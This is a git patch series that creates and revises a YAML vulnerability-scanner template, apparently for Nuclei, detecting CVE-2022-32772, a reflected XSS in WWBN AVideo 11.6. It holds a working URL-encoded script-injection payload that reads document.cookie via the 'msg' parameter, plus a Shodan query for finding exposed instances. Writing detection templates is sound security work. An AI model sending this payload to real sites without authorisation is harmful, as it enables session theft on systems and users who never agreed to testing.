From 0ce9eb2579a0e4246318765d3c29473aaa091068 Mon Sep 17 00:00:00 2001 From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com> Date: Sun, 28 Aug 2022 13:21:09 +0530 Subject: [PATCH 1/3] Create CVE-2022-32772.yaml --- cves/2022/CVE-2022-32772.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2022/CVE-2022-32772.yaml diff --git a/cves/2022/CVE-2022-32772.yaml b/cves/2022/CVE-2022-32772.yaml new file mode 100644 index 0000000000..45fb2c5a3f --- /dev/null +++ b/cves/2022/CVE-2022-32772.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-32772 + +info: + name: WWBN AVideo 11.6 - Reflected Cross Site Scripting + author: arafatansari + severity: medium + description: | + A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "msg" parameter which is inserted into the document with insufficient sanitization. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32772 + - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql + - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 + metadata: + shodan-query: http.html:"AVideo" + verified: "true" + tags: xss,cve,2022, avideo,wwbn + +requests: + - raw: + - | + GET /index.php?msg= HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '' From 5d4595c7e5a5799d4d37d11103ec8603700d6401 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 28 Aug 2022 14:56:59 +0530 Subject: [PATCH 2/3] Update CVE-2022-32772.yaml --- cves/2022/CVE-2022-32772.yaml | 34 ++++++++++++++++++++-------------- 1 file changed, 20 insertions(+), 14 deletions(-) diff --git a/cves/2022/CVE-2022-32772.yaml b/cves/2022/CVE-2022-32772.yaml index 45fb2c5a3f..04573712f7 100644 --- a/cves/2022/CVE-2022-32772.yaml +++ b/cves/2022/CVE-2022-32772.yaml @@ -1,32 +1,38 @@ id: CVE-2022-32772 info: - name: WWBN AVideo 11.6 - Reflected Cross Site Scripting + name: WWBN AVideo 11.6 - Cross Site Scripting author: arafatansari severity: medium description: | - A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "msg" parameter which is inserted into the document with insufficient sanitization. + A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "msg" parameter which is inserted into the document with insufficient sanitization. reference: - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32772 - - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32772 + classification: + cve-id: CVE-2022-32772 metadata: + verified: true shodan-query: http.html:"AVideo" - verified: "true" - tags: xss,cve,2022, avideo,wwbn + tags: cve,cve2022,avideo,xss requests: - - raw: - - | - GET /index.php?msg= HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E" matchers-condition: and matchers: + - type: word + part: body + words: + - 'avideoAlertInfo("' + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - - type: word - words: - - '' From 1778777826da1f8d2adfbeee08c4ddfe92e4d8e0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 29 Aug 2022 22:11:43 +0530 Subject: [PATCH 3/3] Update CVE-2022-32772.yaml --- cves/2022/CVE-2022-32772.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-32772.yaml b/cves/2022/CVE-2022-32772.yaml index 04573712f7..dac5d4fe68 100644 --- a/cves/2022/CVE-2022-32772.yaml +++ b/cves/2022/CVE-2022-32772.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true shodan-query: http.html:"AVideo" - tags: cve,cve2022,avideo,xss + tags: cve,cve2022,avideo,xss,wwbn requests: - method: GET